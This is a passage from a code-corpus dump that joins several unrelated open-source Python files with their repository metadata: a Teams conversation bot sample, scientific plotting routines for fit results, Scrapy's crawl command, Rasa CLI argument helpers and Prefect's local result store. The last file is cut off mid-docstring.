] | 1,303 | 2019-05-06T22:15:41.000Z | 2022-03-31T21:45:38.000Z | samples/python/57.teams-conversation-bot/bots/teams_conversation_bot.py | stevkan/BotBuilder-Samples | 75a21b412d8873906bed3460f7c5f0940a067d58 | [
"MIT"
] | 2,820 | 2016-09-21T03:47:43.000Z | 2019-05-03T15:12:46.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import json
from typing import List
from botbuilder.core import CardFactory, TurnContext, MessageFactory
from botbuilder.core.teams import TeamsActivityHandler, TeamsInfo
from botbuilder.schema import CardAction, HeroCard, Mention, ConversationParameters, Attachment, Activity
from botbuilder.schema.teams import TeamInfo, TeamsChannelAccount
from botbuilder.schema._connector_client_enums import ActionTypes
ADAPTIVECARDTEMPLATE = "resources/UserMentionCardTemplate.json"
class TeamsConversationBot(TeamsActivityHandler):
def __init__(self, app_id: str, app_password: str):
self._app_id = app_id
self._app_password = app_password
async def on_teams_members_added( # pylint: disable=unused-argument
self,
teams_members_added: [TeamsChannelAccount],
team_info: TeamInfo,
turn_context: TurnContext,
):
for member in teams_members_added:
if member.id != turn_context.activity.recipient.id:
await turn_context.send_activity(
f"Welcome to the team { member.given_name } { member.surname }. "
)
async def on_message_activity(self, turn_context: TurnContext):
TurnContext.remove_recipient_mention(turn_context.activity)
text = turn_context.activity.text.strip().lower()
if "mention me" in text:
await self._mention_adaptive_card_activity(turn_context)
return
if "mention" in text:
await self._mention_activity(turn_context)
return
if "update" in text:
await self._send_card(turn_context, True)
return
if "message" in text:
await self._message_all_members(turn_context)
return
if "who" in text:
await self._get_member(turn_context)
return
if "delete" in text:
await self._delete_card_activity(turn_context)
return
await self._send_card(turn_context, False)
return
async def _mention_adaptive_card_activity(self, turn_context: TurnContext):
TeamsChannelAccount: member = None
try:
member = await TeamsInfo.get_member(
turn_context, turn_context.activity.from_property.id
)
except Exception as e:
if "MemberNotFoundInConversation" in e.args[0]:
await turn_context.send_activity("Member not found.")
return
else:
raise
card_path = os.path.join(os.getcwd(), ADAPTIVECARDTEMPLATE)
with open(card_path, "rb") as in_file:
template_json = json.load(in_file)
for t in template_json["body"]:
t["text"] = t["text"].replace("${userName}", member.name)
for e in template_json["msteams"]["entities"]:
e["text"] = e["text"].replace("${userName}", member.name)
e["mentioned"]["id"] = e["mentioned"]["id"].replace("${userUPN}", member.user_principal_name)
e["mentioned"]["id"] = e["mentioned"]["id"].replace("${userAAD}", member.additional_properties["aadObjectId"])
e["mentioned"]["name"] = e["mentioned"]["name"].replace("${userName}", member.name)
adaptive_card_attachment = Activity(
attachments=[CardFactory.adaptive_card(template_json)]
)
await turn_context.send_activity(adaptive_card_attachment)
async def _mention_activity(self, turn_context: TurnContext):
mention = Mention(
mentioned=turn_context.activity.from_property,
text=f"<at>{turn_context.activity.from_property.name}</at>",
type="mention",
)
reply_activity = MessageFactory.text(f"Hello {mention.text}")
reply_activity.entities = [Mention().deserialize(mention.serialize())]
await turn_context.send_activity(reply_activity)
async def _send_card(self, turn_context: TurnContext, isUpdate):
buttons = [
CardAction(
type=ActionTypes.message_back,
title="Message all members",
text="messageallmembers",
),
CardAction(type=ActionTypes.message_back, title="Who am I?", text="whoami"),
CardAction(type=ActionTypes.message_back, title="Find me in Adaptive Card", text="mention me"),
CardAction(
type=ActionTypes.message_back, title="Delete card", text="deletecard"
),
]
if isUpdate:
await self._send_update_card(turn_context, buttons)
else:
await self._send_welcome_card(turn_context, buttons)
async def _send_welcome_card(self, turn_context: TurnContext, buttons):
buttons.append(
CardAction(
type=ActionTypes.message_back,
title="Update Card",
text="updatecardaction",
value={"count": 0},
)
)
card = HeroCard(
title="Welcome Card", text="Click the buttons.", buttons=buttons
)
await turn_context.send_activity(
MessageFactory.attachment(CardFactory.hero_card(card))
)
async def _send_update_card(self, turn_context: TurnContext, buttons):
data = turn_context.activity.value
data["count"] += 1
buttons.append(
CardAction(
type=ActionTypes.message_back,
title="Update Card",
text="updatecardaction",
value=data,
)
)
card = HeroCard(
title="Updated card", text=f"Update count {data['count']}", buttons=buttons
)
updated_activity = MessageFactory.attachment(CardFactory.hero_card(card))
updated_activity.id = turn_context.activity.reply_to_id
await turn_context.update_activity(updated_activity)
async def _get_member(self, turn_context: TurnContext):
TeamsChannelAccount: member = None
try:
member = await TeamsInfo.get_member(
turn_context, turn_context.activity.from_property.id
)
except Exception as e:
if "MemberNotFoundInConversation" in e.args[0]:
await turn_context.send_activity("Member not found.")
else:
raise
else:
await turn_context.send_activity(f"You are: {member.name}")
async def _message_all_members(self, turn_context: TurnContext):
team_members = await self._get_paged_members(turn_context)
for member in team_members:
conversation_reference = TurnContext.get_conversation_reference(
turn_context.activity
)
conversation_parameters = ConversationParameters(
is_group=False,
bot=turn_context.activity.recipient,
members=[member],
tenant_id=turn_context.activity.conversation.tenant_id,
)
async def get_ref(tc1):
conversation_reference_inner = TurnContext.get_conversation_reference(
tc1.activity
)
return await tc1.adapter.continue_conversation(
conversation_reference_inner, send_message, self._app_id
)
async def send_message(tc2: TurnContext):
return await tc2.send_activity(
f"Hello {member.name}. I'm a Teams conversation bot."
) # pylint: disable=cell-var-from-loop
await turn_context.adapter.create_conversation(
conversation_reference, get_ref, conversation_parameters
)
await turn_context.send_activity(
MessageFactory.text("All messages have been sent")
)
async def _get_paged_members(
self, turn_context: TurnContext
) -> List[TeamsChannelAccount]:
paged_members = []
continuation_token = None
while True:
current_page = await TeamsInfo.get_paged_members(
turn_context, continuation_token, 100
)
continuation_token = current_page.continuation_token
paged_members.extend(current_page.members)
if continuation_token is None:
break
return paged_members
async def _delete_card_activity(self, turn_context: TurnContext):
await turn_context.delete_activity(turn_context.activity.reply_to_id)
| 38 | 122 | 0.621884 |
0192df069ab62978917a3c80ec432603e42adae7 | 93 | py | Python | imdb_rating/dependencies/__init__.py | PeregHer/imdb-rating-predictions | 39c1730fc46449aeda6984c2bdec549e42092498 | [
"MIT"
] | null | null | null | imdb_rating/dependencies/__init__.py | PeregHer/imdb-rating-predictions | 39c1730fc46449aeda6984c2bdec549e42092498 | [
"MIT"
] | null | null | null | imdb_rating/dependencies/__init__.py | PeregHer/imdb-rating-predictions | 39c1730fc46449aeda6984c2bdec549e42092498 | [
"MIT"
] | null | null | null | from .models import Movie
from .spiders import IMDBSpider
__all__ = ["Movie", "IMDBSpider"]
| 18.6 | 33 | 0.752688 |
7558e11640c88a417fe12825f28debe391ebee2e | 20,196 | py | Python | src/satlas2/plotting.py | woutergins/satlas2 | 51afdc445c8c603372bb26abe19d1eb7bd3f3f24 | [
"MIT"
] | null | null | null | src/satlas2/plotting.py | woutergins/satlas2 | 51afdc445c8c603372bb26abe19d1eb7bd3f3f24 | [
"MIT"
] | null | null | null | src/satlas2/plotting.py | woutergins/satlas2 | 51afdc445c8c603372bb26abe19d1eb7bd3f3f24 | [
"MIT"
] | null | null | null | """
Functions for the generation of plots related to the fitting results.
.. moduleauthor:: Wouter Gins <wouter.a.gins@jyu.fi>
"""
import copy
import h5py
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import uncertainties as u
from scipy import optimize
from scipy.stats import chi2
import tqdm
from .overwrite import SATLASHDFBackend
inv_color_list = ['#7acfff', '#fff466', '#00c48f', '#ff8626', '#ff9cd3', '#0093e6']
color_list = [c for c in reversed(inv_color_list)]
cmap = mpl.colors.ListedColormap(color_list)
cmap.set_over(color_list[-1])
cmap.set_under(color_list[0])
invcmap = mpl.colors.ListedColormap(inv_color_list)
invcmap.set_over(inv_color_list[-1])
invcmap.set_under(inv_color_list[0])
__all__ = ['generateChisquareMap', 'generateCorrelationPlot', 'generateWalkPlot']
def _make_axes_grid(no_variables, padding=0, cbar_size=0.5, axis_padding=0.5, cbar=True):
"""Makes a triangular grid of axes, with a colorbar axis next to it.
Parameters
----------
no_variables: int
Number of variables for which to generate a figure.
padding: float
Padding around the figure (in cm).
cbar_size: float
Width of the colorbar (in cm).
axis_padding: float
Padding between axes (in cm).
Returns
-------
fig, axes, cbar: tuple
Tuple containing the figure, a 2D-array of axes and the colorbar axis."""
# Convert to inches.
padding, cbar_size, axis_padding = (padding * 0.393700787,
cbar_size * 0.393700787,
axis_padding * 0.393700787)
if not cbar:
cbar_size = 0
# Generate the figure, convert padding to percentages.
fig = plt.figure()
padding = 1
axis_size_left = (fig.get_figwidth()-padding - 0*(no_variables + 1) * padding) / no_variables
axis_size_up = (fig.get_figheight()-padding - 0*(no_variables + 1) * padding) / no_variables
cbar_size = cbar_size / fig.get_figwidth()
left_padding = padding * 0.5 / fig.get_figwidth()
left_axis_padding = axis_padding / fig.get_figwidth()
up_padding = padding * 0.5 / fig.get_figheight()
up_axis_padding = 0*axis_padding / fig.get_figheight()
axis_size_left = axis_size_left / fig.get_figwidth()
axis_size_up = axis_size_up / fig.get_figheight()
# Pre-allocate a 2D-array to hold the axes.
axes = np.array([[None for _ in range(no_variables)] for _ in range(no_variables)],
dtype='object')
for i, I in zip(range(no_variables), reversed(range(no_variables))):
for j in reversed(range(no_variables)):
# Only create axes on the lower triangle.
if I + j < no_variables:
# Share the x-axis with the plot on the diagonal,
# directly above the plot.
sharex = axes[j, j] if i != j else None
# Share the y-axis among the 2D maps along one row,
# but not the plot on the diagonal!
sharey = axes[i, i-1] if (i != j and i-1 != j) else None
# Determine the place and size of the axes
left_edge = j * axis_size_left + left_padding
bottom_edge = I * axis_size_up + up_padding
if j > 0:
left_edge += j * left_axis_padding
if I > 0:
bottom_edge += I * up_axis_padding
a = plt.axes([left_edge, bottom_edge, axis_size_left, axis_size_up],
sharex=sharex, sharey=sharey)
plt.setp(a.xaxis.get_majorticklabels(), rotation=45)
plt.setp(a.yaxis.get_majorticklabels(), rotation=45)
else:
a = None
if i == j:
a.yaxis.tick_right()
a.yaxis.set_label_position('right')
axes[i, j] = a
axes = np.array(axes)
for a in axes[:-1, :].flatten():
if a is not None:
plt.setp(a.get_xticklabels(), visible=False)
for a in axes[:, 1:].flatten():
if a is not None:
plt.setp(a.get_yticklabels(), visible=False)
left_edge = no_variables*(axis_size_left+left_axis_padding)+left_padding
bottom_edge = up_padding
width = cbar_size
height = axis_size_up * len(axes) + up_padding * (len(axes) - 1)
cbar_width = axis_size_left * 0.1
if cbar:
cbar = plt.axes([1-cbar_width-padding*0.5/fig.get_figwidth(), padding*0.5/fig.get_figheight()+axis_size_up*1.5, cbar_width, axis_size_up*(no_variables-1)-axis_size_up*0.5])
plt.setp(cbar.get_xticklabels(), visible=False)
plt.setp(cbar.get_yticklabels(), visible=False)
else:
cbar = None
return fig, axes, cbar
def generateChisquareMap(fitter, filter=None, method='chisquare', resolution_diag=15, resolution_map=15, fit_kws={}, source=False, model=True):
"""Generates a correlation map for either the chisquare or the MLE method.
On the diagonal, the chisquare or loglikelihood is drawn as a function of one fixed parameter.
Refitting to the data each time gives the points on the line. A dashed line is drawn on these
plots, with the intersection with the plots giving the correct confidence interval for the
parameter. In solid lines, the interval estimated by the fitting routine is drawn.
On the offdiagonal, two parameters are fixed and the model is again fitted to the data.
The change in chisquare/loglikelihood is mapped to 1, 2 and 3 sigma contourmaps.
Parameters
----------
fitter: :class:`.Fitter`
Fitter instance for which the chisquare map must be created.
Other parameters
----------------
filter: list of strings
Only the parameters matching the names given in this list will be used
to generate the maps.
resolution_diag: int
Number of points for the line plot on each diagonal.
resolution_map: int
Number of points along each dimension for the meshgrids.
fit_kws: dictionary
Dictionary of keywords to pass on to the fitting routine.
npar: int
Number of parameters for which simultaneous predictions need to be made.
Influences the uncertainty estimates from the parabola."""
title = '{}\n${}_{{-{}}}^{{+{}}}$'
title_e = '{}\n$({}_{{-{}}}^{{+{}}})e{}$'
try:
orig_value = fitter.chisqr
except AttributeError:
fitter.fit(**fit_kws)
orig_value = fitter.chisqr
if method.lower().startswith('llh'):
orig_value = fitter.llh_result
result = copy.deepcopy(fitter.result)
orig_params = copy.deepcopy(fitter.lmpars)
ranges = {}
param_names = []
no_params = 0
for p in orig_params:
if orig_params[p].vary and (filter is None or any([f in p for f in filter])):
no_params += 1
param_names.append(p)
fig, axes, cbar = _make_axes_grid(no_params, axis_padding=0, cbar=no_params > 1)
split_names = [name.split('___') for name in param_names]
sources = [name[0] for name in split_names]
models = [name[1] for name in split_names]
var_names = [name[2] for name in split_names]
to_be_combined = [var_names]
if model:
to_be_combined.insert(0, models)
if source:
to_be_combined.insert(0, sources)
var_names = [' '.join(tbc) for tbc in zip(*to_be_combined)]
# Make the plots on the diagonal: plot the chisquare/likelihood
# for the best fitting values while setting one parameter to
# a fixed value.
saved_params = copy.deepcopy(fitter.lmpars)
for i in range(no_params):
params = copy.deepcopy(saved_params)
ranges[param_names[i]] = {}
# Set the y-ticklabels.
ax = axes[i, i]
ax.set_title(param_names[i])
if i == no_params-1:
if method.lower().startswith('chisquare'):
ax.set_ylabel(r'$\Delta\chi^2$')
else:
ax.set_ylabel(r'$\Delta\mathcal{L}$')
fit_kws['llh_selected'] = True
# Select starting point to determine error widths.
value = orig_params[param_names[i]].value
stderr = orig_params[param_names[i]].stderr
stderr = stderr if stderr is not None else 0.01 * np.abs(value)
stderr = stderr if stderr != 0 else 0.01 * np.abs(value)
right = value + stderr
left = value - stderr
params[param_names[i]].vary = False
ranges[param_names[i]]['left_val'] = 3*left - 2*value
ranges[param_names[i]]['right_val'] = 3*right - 2*value
value_range = np.linspace(3*left - 2*value, right*3 - 2*value, resolution_diag)
chisquare = np.zeros(len(value_range))
# Calculate the new value, and store it in the array. Update the progressbar.
# with tqdm.tqdm(value_range, desc=param_names[i], leave=True) as pbar:
for j, v in enumerate(value_range):
params[param_names[i]].value = v
fitter.lmpars = params
fitter.fit(prepFit=False, **fit_kws)
if fitter.llh_result is not None:
chisquare[j] = fitter.llh_result - orig_value
else:
chisquare[j] = fitter.chisqr - orig_value
# pbar.update(1)
# Plot the result
ax.plot(value_range, chisquare, color='k')
c = '#0093e6'
ax.axvline(right, ls="dashed", color=c)
ax.axvline(left, ls="dashed", color=c)
ax.axvline(value, ls="dashed", color=c)
up = '{:.2ug}'.format(u.ufloat(value, stderr))
down = '{:.2ug}'.format(u.ufloat(value, stderr))
val = up.split('+/-')[0].split('(')[-1]
r = up.split('+/-')[1].split(')')[0]
l = down.split('+/-')[1].split(')')[0]
if 'e' in up or 'e' in down:
ex = up.split('e')[-1]
ax.set_title(title_e.format(var_names[i], val, l, r, ex))
else:
ax.set_title(title.format(var_names[i], val, l, r))
# Restore the parameters.
fitter.lmpars = orig_params
for i, j in zip(*np.tril_indices_from(axes, -1)):
params = copy.deepcopy(orig_params)
ax = axes[i, j]
x_name = param_names[j]
y_name = param_names[i]
if j == 0:
ax.set_ylabel(var_names[i])
if i == no_params - 1:
ax.set_xlabel(var_names[j])
right = ranges[x_name]['right_val']
left = ranges[x_name]['left_val']
x_range = np.linspace(left, right, resolution_map)
right = ranges[y_name]['right_val']
left = ranges[y_name]['left_val']
y_range = np.linspace(left, right, resolution_map)
X, Y = np.meshgrid(x_range, y_range)
Z = np.zeros(X.shape)
i_indices, j_indices = np.indices(Z.shape)
params[param_names[i]].vary = False
params[param_names[j]].vary = False
for k, l in zip(i_indices.flatten(), j_indices.flatten()):
x = X[k, l]
y = Y[k, l]
params[param_names[j]].value = x
params[param_names[i]].value = y
fitter.lmpars = params
fitter.fit(prepFit=False, **fit_kws)
if fitter.llh_result is not None:
Z[k, l] = (fitter.llh_result - orig_value)*2
else:
Z[k, l] = fitter.chisqr - orig_value
Z = -Z
bounds = []
for bound in [0.997300204, 0.954499736, 0.682689492]:
chifunc = lambda x: chi2.cdf(x, 1) - bound # Calculate 1 sigma boundary
bounds.append(-optimize.root(chifunc, 1).x[0])
bounds.append(0)
bounds = np.array(bounds)
norm = mpl.colors.BoundaryNorm(bounds, invcmap.N)
contourset = ax.contourf(X, Y, Z, bounds, cmap=invcmap, norm=norm)
fitter.lmpars = copy.deepcopy(orig_params)
try:
cbar = plt.colorbar(contourset, cax=cbar, orientation='vertical')
cbar.ax.yaxis.set_ticks([-7.5, -4.5, -1.5])
cbar.ax.set_yticklabels([r'3$\sigma$', r'2$\sigma$', r'1$\sigma$'])
except:
pass
for a in axes.flatten():
if a is not None:
for label in a.get_xticklabels()[::2]:
label.set_visible(False)
for label in a.get_yticklabels()[::2]:
label.set_visible(False)
fitter.result = result
fitter.updateInfo()
return fig, axes, cbar
def generateCorrelationPlot(filename, filter=None, bins=None, selection=(0, 100), source=False, model=True):
"""Given the random walk data, creates a triangle plot: distribution of
a single parameter on the diagonal axes, 2D contour plots with 1, 2 and
3 sigma contours on the off-diagonal. The 1-sigma limits based on the
percentile method are also indicated, as well as added to the title.
Parameters
----------
filename: string
Filename for the h5 file containing the data from the walk.
filter: list of str, optional
If supplied, only this list of columns is used for the plot.
bins: int or list of int, optional
If supplied, use this number of bins for the plotting.
Returns
-------
figure
Returns the MatPlotLib figure created."""
reader = SATLASHDFBackend(filename)
var_names = list(reader.labels)
split_names = [name.split('___') for name in var_names]
sources = [name[0]+'\n' for name in split_names]
models = [name[1] for name in split_names]
var_names = [name[2] for name in split_names]
to_be_combined = [var_names]
if model:
to_be_combined.insert(0, models)
if source:
to_be_combined.insert(0, sources)
var_names = [' '.join(tbc) for tbc in zip(*to_be_combined)]
data = reader.get_chain(flat=False)
dataset_length = data.shape[0]
first, last = int(np.floor(dataset_length/100*selection[0])), int(np.ceil(dataset_length/100*selection[1]))
data = data[first:last, :, :]
data = data.reshape(-1, data.shape[-1])
if filter is not None:
filter = [c for f in filter for c in var_names if f in c]
else:
filter = var_names
with tqdm.tqdm(total=len(filter)+(len(filter)**2-len(filter))/2, leave=True) as pbar:
fig, axes, cbar = _make_axes_grid(len(filter), axis_padding=0)
metadata = {}
if not isinstance(bins, list):
bins = [bins for _ in filter]
for i, val in enumerate(filter):
pbar.set_description(val)
ax = axes[i, i]
bin_index = i
i = var_names.index(val)
x = data[:, i]
if bins[bin_index] is None:
width = 3.5*np.std(x)/x.size**(1/3) #Scott's rule for binwidth
bins[bin_index] = np.arange(x.min(), x.max()+width, width)
try:
n, b, p, = ax.hist(x, int(bins[bin_index]), histtype='step', color='k')
except TypeError:
bins[bin_index] = 50
n, b, p, = ax.hist(x, int(bins[bin_index]), histtype='step', color='k')
# center = n.argmax()
# q50 = (b[center] + b[center+1])/2
q = [15.87, 50, 84.13]
q16, q50, q84 = np.percentile(x, q)
metadata[val] = {'bins': bins[bin_index], 'min': x.min(), 'max': x.max()}
title = '{}\n${}_{{-{}}}^{{+{}}}$'
title_e = '{}\n$({}_{{-{}}}^{{+{}}})e{}$'
up = '{:.2ug}'.format(u.ufloat(q50, np.abs(q84-q50)))
down = '{:.2ug}'.format(u.ufloat(q50, np.abs(q50-q16)))
param_val = up.split('+/-')[0].split('(')[-1]
r = up.split('+/-')[1].split(')')[0]
l = down.split('+/-')[1].split(')')[0]
if 'e' in up or 'e' in down:
ex = up.split('e')[-1]
ax.set_title(title_e.format(val, param_val, l, r, ex))
else:
ax.set_title(title.format(val, param_val, l, r))
qvalues = [q16, q50, q84]
c = '#0093e6'
for q in qvalues:
ax.axvline(q, ls="dashed", color=c)
ax.set_yticks([])
ax.set_yticklabels([])
pbar.update(1)
for i, j in zip(*np.tril_indices_from(axes, -1)):
x_name = filter[j]
y_name = filter[i]
pbar.set_description(', '.join([x_name, y_name]))
ax = axes[i, j]
if j == 0:
ax.set_ylabel(filter[i])
if i == len(filter) - 1:
ax.set_xlabel(filter[j])
j = var_names.index(x_name)
i = var_names.index(y_name)
x = data[:, j]
y = data[:, i]
x_min, x_max, x_bins = metadata[x_name]['min'], metadata[x_name]['max'], metadata[x_name]['bins']
y_min, y_max, y_bins = metadata[y_name]['min'], metadata[y_name]['max'], metadata[y_name]['bins']
X = np.linspace(x_min, x_max, x_bins + 1)
Y = np.linspace(y_min, y_max, y_bins + 1)
H, X, Y = np.histogram2d(x.flatten(), y.flatten(), bins=(X, Y),
weights=None)
X1, Y1 = 0.5 * (X[1:] + X[:-1]), 0.5 * (Y[1:] + Y[:-1])
X, Y = X[:-1], Y[:-1]
H = (H - H.min()) / (H.max() - H.min())
Hflat = H.flatten()
inds = np.argsort(Hflat)[::-1]
Hflat = Hflat[inds]
sm = np.cumsum(Hflat)
sm /= sm[-1]
levels = 1.0 - np.exp(-0.5 * np.arange(1, 3.1, 1) ** 2)
V = np.empty(len(levels))
for i, v0 in enumerate(levels):
try:
V[i] = Hflat[sm <= v0][-1]
except:
V[i] = Hflat[0]
bounds = np.unique(np.concatenate([[H.max()], V])[::-1])
norm = mpl.colors.BoundaryNorm(bounds, invcmap.N)
contourset = ax.contourf(X1, Y1, H.T, bounds, cmap=invcmap, norm=norm)
pbar.update(1)
try:
cbar = plt.colorbar(contourset, cax=cbar, orientation='vertical')
cbar.ax.yaxis.set_ticks([0, 1/6, 0.5, 5/6])
cbar.ax.set_yticklabels(['', r'3$\sigma$', r'2$\sigma$', r'1$\sigma$'])
except:
cbar = None
return fig, axes, cbar
def generateWalkPlot(filename, filter=None, selection=(0, 100), walkers=20, source=False, model=True):
"""Given the random walk data, the random walk for the selected parameters
is plotted.
Parameters
----------
filename: string
Filename for the h5 file containing the data from the walk.
filter: list of str, optional
If supplied, only this list of parameters is used for the plot.
Returns
-------
figure
Returns the MatPlotLib figure created."""
reader = SATLASHDFBackend(filename)
var_names = reader.labels
split_names = [name.split('___') for name in var_names]
sources = [name[0] for name in split_names]
models = [name[1] for name in split_names]
var_names = [name[2] for name in split_names]
to_be_combined = [var_names]
if model:
to_be_combined.insert(0, models)
if source:
to_be_combined.insert(0, sources)
var_names = [' '.join(tbc) for tbc in zip(*to_be_combined)]
data = reader.get_chain(flat=False)
dataset_length = data.shape[0]
first, last = int(np.floor(dataset_length/100*selection[0])), int(np.ceil(dataset_length/100*selection[1]))
data = data[first:last, :, :]
# data = data.reshape(-1, data.shape[-1])
if filter is not None:
filter = [c for f in filter for c in var_names if f in c]
else:
filter = var_names
with tqdm.tqdm(total=len(filter), leave=True) as pbar:
fig, axes = plt.subplots(len(filter), 1, sharex=True)
for i, (val, ax) in enumerate(zip(filter, axes)):
pbar.set_description(val)
i = var_names.index(val)
x = data[:, :, i]
q50 = np.percentile(x, [50.0])
ax.plot(range(first, last), x, alpha=0.3, color='gray')
ax.set_ylabel(val)
ax.axhline(q50, color='k')
pbar.update(1)
ax.set_xlabel('Step')
pbar.close()
return fig, axes
| 39.6 | 180 | 0.583284 |
a488a56d08886c8b69cff1bb580027a6c37eaca4 | 1,085 | py | Python | scrapy/commands/crawl.py | ZhiShiMao/scrapy | 04dd29257a81be0b1291db61dd880ef3dd96127d | [
"BSD-3-Clause"
] | null | null | null | scrapy/commands/crawl.py | ZhiShiMao/scrapy | 04dd29257a81be0b1291db61dd880ef3dd96127d | [
"BSD-3-Clause"
] | null | null | null | scrapy/commands/crawl.py | ZhiShiMao/scrapy | 04dd29257a81be0b1291db61dd880ef3dd96127d | [
"BSD-3-Clause"
] | null | null | null | from scrapy.commands import BaseRunSpiderCommand
from scrapy.exceptions import UsageError
class Command(BaseRunSpiderCommand):
requires_project = True
def syntax(self):
return "[options] <spider>"
def short_desc(self):
return "Run a spider"
def run(self, args, opts):
if len(args) < 1:
raise UsageError()
elif len(args) > 1:
raise UsageError(
"running 'scrapy crawl' with more than one spider is no longer supported"
)
spname = args[0]
crawl_defer = self.crawler_process.crawl(spname, **opts.spargs)
if getattr(crawl_defer, "result", None) is not None and issubclass(
crawl_defer.result.type, Exception
):
self.exitcode = 1
else:
self.crawler_process.start()
if (
self.crawler_process.bootstrap_failed
or hasattr(self.crawler_process, "has_exception")
and self.crawler_process.has_exception
):
self.exitcode = 1
| 27.820513 | 89 | 0.586175 |
41f193247bbfb9f7759ae522e3e6a47f40d8d379 | 3,800 | py | Python | rasa/cli/arguments/default_arguments.py | gthb/rasa | 9c3affff47496b6e8848d41acf5ab885b7037c30 | [
"Apache-2.0"
] | null | null | null | rasa/cli/arguments/default_arguments.py | gthb/rasa | 9c3affff47496b6e8848d41acf5ab885b7037c30 | [
"Apache-2.0"
] | null | null | null | rasa/cli/arguments/default_arguments.py | gthb/rasa | 9c3affff47496b6e8848d41acf5ab885b7037c30 | [
"Apache-2.0"
] | null | null | null | import argparse
import logging
from typing import Text, Union, Optional
from rasa.constants import (
DEFAULT_DATA_PATH,
DEFAULT_MODELS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_CONFIG_PATH,
)
def add_model_param(
parser: argparse.ArgumentParser,
model_name: Text = "Rasa",
add_positional_arg: bool = True,
default: Optional[Text] = DEFAULT_MODELS_PATH,
):
help_text = (
"Path to a trained {} model. If a directory is specified, it will "
"use the latest model in this directory.".format(model_name)
)
parser.add_argument("-m", "--model", type=str, default=default, help=help_text)
if add_positional_arg:
parser.add_argument(
"model-as-positional-argument", nargs="?", type=str, help=help_text
)
def add_stories_param(
parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
stories_name: Text = "training",
) -> None:
parser.add_argument(
"-s",
"--stories",
type=str,
default=DEFAULT_DATA_PATH,
help="File or folder containing your {} stories.".format(stories_name),
)
def add_nlu_data_param(
parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
help_text: Text,
default: Optional[Text] = DEFAULT_DATA_PATH,
):
parser.add_argument("-u", "--nlu", type=str, default=default, help=help_text)
def add_domain_param(
parser: Union[argparse.ArgumentParser, argparse._ActionsContainer]
):
parser.add_argument(
"-d",
"--domain",
type=str,
default=DEFAULT_DOMAIN_PATH,
help="Domain specification (yml file).",
)
def add_config_param(
parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
default: Optional[Text] = DEFAULT_CONFIG_PATH,
):
parser.add_argument(
"-c",
"--config",
type=str,
default=default,
help="The policy and NLU pipeline configuration of your bot.",
)
def add_out_param(
parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
help_text: Text,
default: Optional[Text] = DEFAULT_MODELS_PATH,
required: bool = False,
):
parser.add_argument(
"--out", type=str, default=default, help=help_text, required=required
)
def add_endpoint_param(
parser: Union[argparse.ArgumentParser, argparse._ActionsContainer], help_text: Text
):
parser.add_argument("--endpoints", type=str, default=None, help=help_text)
def add_data_param(
parser: Union[argparse.ArgumentParser, argparse._ActionsContainer],
default: Optional[Text] = DEFAULT_MODELS_PATH,
required: bool = False,
data_type: Text = "Rasa ",
):
parser.add_argument(
"--data",
type=str,
default=default,
help="Path to the file or directory containing {}data.".format(data_type),
required=required,
)
def add_logging_options(parser: argparse.ArgumentParser):
"""Add options to an argument parser to configure logging levels."""
logging_arguments = parser.add_argument_group("Python Logging Options")
# arguments for logging configuration
logging_arguments.add_argument(
"-v",
"--verbose",
help="Be verbose. Sets logging level to INFO.",
action="store_const",
dest="loglevel",
const=logging.INFO,
)
logging_arguments.add_argument(
"-vv",
"--debug",
help="Print lots of debugging statements. Sets logging level to DEBUG.",
action="store_const",
dest="loglevel",
const=logging.DEBUG,
)
logging_arguments.add_argument(
"--quiet",
help="Be quiet! Sets logging level to WARNING.",
action="store_const",
dest="loglevel",
const=logging.WARNING,
)
| 27.737226 | 87 | 0.66 |
2e5f87f573d4040bc53c23ab832fd34ae6dbe568 | 3,694 | py | Python | src/prefect/engine/results/local_result.py | louisditzel/prefect | b1a02fee623b965e756a38aa09059db780ab67eb | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/prefect/engine/results/local_result.py | louisditzel/prefect | b1a02fee623b965e756a38aa09059db780ab67eb | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/prefect/engine/results/local_result.py | louisditzel/prefect | b1a02fee623b965e756a38aa09059db780ab67eb | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import os
from typing import Any
import cloudpickle
from prefect import config
from prefect.engine.result import Result
class LocalResult(Result):
"""
Result that is written to and retrieved from the local file system.
Args:
- dir (str, optional): the _absolute_ path to a directory for storing
all results; defaults to `${prefect.config.home_dir}/results`
- validate_dir (bool, optional): a boolean specifying whether to validate the
provided directory path; if `True`, the directory will be converted to an
absolute path and created. Defaults to `True`
- **kwargs (Any, optional): any additional `Result` initialization options
"""
def __init__(
self, dir: str = None, validate_dir: bool = True, **kwargs: Any
) -> None:
full_prefect_path = os.path.abspath(config.home_dir)
if (
dir is None
or os.path.commonpath([full_prefect_path, os.path.abspath(dir)])
== full_prefect_path
):
directory = os.path.join(config.home_dir, "results")
else:
directory = dir
if validate_dir:
abs_directory = os.path.abspath(os.path.expanduser(directory))
if not os.path.exists(abs_directory):
os.makedirs(abs_directory)
else:
abs_directory = directory
self.dir = abs_directory
super().__init__(**kwargs)
def read(self, location: str) -> Result:
"""
Reads a result from the local file system and returns the corresponding `Result` instance.
Args:
- location (str): the location to read from
Returns:
- Result: a new result instance with the data represented by the location
"""
new = self.copy()
new.location = location
self.logger.debug("Starting to read result from {}...".format(location))
with open(os.path.join(self.dir, location), "rb") as f:
new.value = cloudpickle.loads(f.read())
self.logger.debug("Finished reading result from {}...".format(location))
return new
def write(self, value: Any, **kwargs: Any) -> Result:
"""
Writes the result to a location in the local file system and returns a new `Result`
object with the result's location.
Args:
- value (Any): the value to write; will then be stored as the `value` attribute
of the returned `Result` instance
- **kwargs (optional): if provided, will be used to format the location template
to determine the location to write to
Returns:
- Result: returns a new `Result` with both `value` and `location` attributes
"""
new = self.format(**kwargs)
new.value = value
self.logger.debug("Starting to upload result to {}...".format(new.location))
with open(os.path.join(self.dir, new.location), "wb") as f:
f.write(cloudpickle.dumps(new.value))
self.logger.debug("Finished uploading result to {}...".format(new.location))
return new
def exists(self, location: str) -> bool:
"""
Checks whether the target result exists in the file system.
Does not validate whether the result is `valid`, only that it is present.
Args:
- location (str): Location of the result in the specific result target.
Will check whether the provided location exists
Returns:
